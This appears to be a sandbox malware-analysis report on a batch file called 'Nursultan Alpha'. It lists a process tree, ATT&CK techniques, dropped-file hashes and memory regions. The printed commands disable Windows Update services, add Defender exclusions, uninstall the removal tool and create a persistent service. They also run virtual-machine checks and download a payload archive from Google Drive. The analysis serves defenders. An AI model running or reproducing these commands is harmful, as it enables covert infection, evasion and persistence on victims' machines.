    3⤵
    - Launches sc.exe
    PID:2144
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1924
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:572
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1496
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2196
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:824
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1636
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:604
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2520
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "RLNALEWN"
    3⤵
    - Launches sc.exe
    PID:964
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1048
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "RLNALEWN"
    3⤵
    - Launches sc.exe
    PID:1392
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:2724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:3004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:1128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:3020
- C:\Windows\system32\rundll32.exe
  rundll32
  2⤵
  PID:2012
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:1824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:496

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1348

C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1000
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1684
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2492
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2240
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2368
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2200
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2480
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2228
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1740
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2216
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2888
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2792

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2864

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://appdata/
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:932
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:932 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1068

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\Nursultan Alpha\start.bat" "
1⤵
PID:1860
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:1636
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:2248
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:1664
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:1980
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:3040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:1528
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2324
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:2896
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:1044
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
  2⤵
  PID:836
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1824
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:1724
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:1128
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1748
- C:\Windows\system32\doskey.exe
  doskey CD=RECOVER
  2⤵
  PID:2988
- C:\Windows\system32\doskey.exe
  doskey TYPE=ROBOCOPY
  2⤵
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotDEbKM.bat

Filesize
188B

MD5
efbd5d5781ef79c05a56b97edf9228b1

SHA1
4d3e26689d111abdbd5f0d872532e5de1efe4599

SHA256
43842e162c505a78cdbb80ba1ae88d7c770f6943d6968ff1a0895acf3b9213e1

SHA512
82764fcf34549d975d17a662bca27afc1be610f4be0aa5840664e55f1d1fc572f5fae67f6f20e51bea5b16df6a7a54e949ebcb2ba55c8f00323ed7afe7cbc976

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat

Filesize
13B

MD5
337065424ed27284c55b80741f912713

SHA1
0e99e1b388ae66a51a8ffeee3448c3509a694db8

SHA256
4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

SHA512
d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat

Filesize
97B

MD5
fc6844c64fc58a66642bc9143f133d8b

SHA1
692447aa8771bb139eb90a1e5d196c839b6f41c7

SHA256
25777a08d3f8167ddc0a959d79308eb368c5e87ba33be46155c761fb4df07454

SHA512
cbba71fb05552201b92261e382451b82d6fe5d83029b4e21db214fc01b28efb8dcdf9f0bbff0dfec984bf99d9b0b9119c766365c9052327a71e0c7db443197e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe

Filesize
2.5MB

MD5
c9a04bf748d1ee29a43ac3f0ddace478

SHA1
891bd4e634a9c5fec1a3de80bff55c665236b58d

SHA256
a6ce588a83f2c77c794e3584e8ac44e472d26cf301bb2bf0468bcabae55070bc

SHA512
e17edb74f5cb4d8aabb4c775ec25a271f201da3adcb03541b1919526c0939694a768affc21c3066327e57c13bc9bb481074e51e4e78867df847b26f063b4c115

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe

Filesize
83KB

MD5
c51ac4b445ba39b6a826fe95e4c8015b

SHA1
d87925eb0e55ec13a1fa9700d2f2308445a9bf83

SHA256
a636706ceed3032a0b2ccab47dad288f9e1d02c01b4fb7a8529291fc32736776

SHA512
b859aa84aeef68bc17e3afb962f27bfde8265ee3142b38465cb697ae3396834273e51d4a4255b06bf1ad9edc76817fcea31e4460384a952cb33731e383b3d708

Download Submit
C:\Users\Admin\AppData\Local\Temp\java.rar

Filesize
2.1MB

MD5
e72a64d106458f9060515c13f83acc4b

SHA1
b175aadb8b24204369a4e7a9ba4bd73d88b0c20a

SHA256
1591b9b01a110d92fdcb036f148e6861e2b199dd8ab331f61c7a0764760be06e

SHA512
8548d2eb7a8cb2e8a04581e9fd5c9aad60838270c0c038b876679e39fa876a0b707185888e04b63e15486f1197efd084ea584b5f1fdea11f147d93b8e042fd54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
90efe29e54c0684ca2aebfcae783bd7f

SHA1
cd7492dc84d33b2f9bf75060b004c45737929314

SHA256
1a2f246f33994c0d287af0d54072003eab5a2c238454640e4298e39b005af3e8

SHA512
090dcafba2ac99d00ac79652464741a6e5671a6aa16e3991dfcf0bacf69600cb3f2df1ddd6d05c2e936a85e860745dd4e23e21779d0d3d4992532406188174b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q6PEJL8YZ8QKRW8UQB3I.temp

Filesize
7KB

MD5
5ac73cab9c76451af33b48ef95fc53e1

SHA1
3ea7f041ed69defd27a99ed895707738684ffe13

SHA256
e0a15e29eefd13fc4942f5324f29ba25f194d4c003dfe8c528d355e612d7db0c

SHA512
257187d9b04f4d47744f49afc391d1a21a52b77c2324cc6156abe584615670c029b073d0aac8746240babe24a15c3c0f06cf5260dc0b8ea8c205d27312bd0ea6

Download Submit
C:\Users\Admin\Desktop\Nursultan Alpha\kdotDEbKM.bat

Filesize
177B

MD5
806c0f6be64541e921ae112a6180941c

SHA1
796aff362a7647a77625ccdbd51ce8fcc3403db9

SHA256
cc9065cfb43157b7f7d3b270c17b04a8c3e10fd4c22d9cddac6795327fa9625b

SHA512
54139b72f59da76d51c44c1d2cbc06c5c7fcb783a1db80cf82c6c5b9ac8c12410b4d46579d65a8d589d6de29716d8e11437313f1d4cfd3c0fdd8b5375c9c390e

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1007B

MD5
3a9662312614b856b548c94bc410cd23

SHA1
e008df0cd134359e2ae897975f5a258cdda67cef

SHA256
d47944cc0756d7b558fd2ee5cc0e1f8aeb195c22b5fa40c912130d1c36958395

SHA512
435a8555c0c90668baaf10c6c9e016b651bb14b1f0fe0427dade063d7de65621fd1bbb75e667276e5ba8049e30d4f018b86b5267df0b7b731c1cc314eaede2ed

Download Submit
memory/1504-151-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/1528-349-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1528-350-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

Filesize
32KB

Download
memory/1544-112-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2136-368-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2136-367-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2236-61-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2236-62-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-60-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2236-64-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-65-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-63-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-59-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

Filesize
4KB

Download
memory/2236-66-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-276-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-273-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-272-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-270-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-268-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-267-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-275-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-266-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-264-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-269-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-274-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-271-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/2792-265-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-277-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2792-278-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2888-258-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2888-262-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2888-255-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2888-256-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2888-257-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2888-259-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2928-227-0x0000000000E90000-0x0000000000EAC000-memory.dmp

Filesize
112KB

Download
memory/2988-84-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2988-83-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download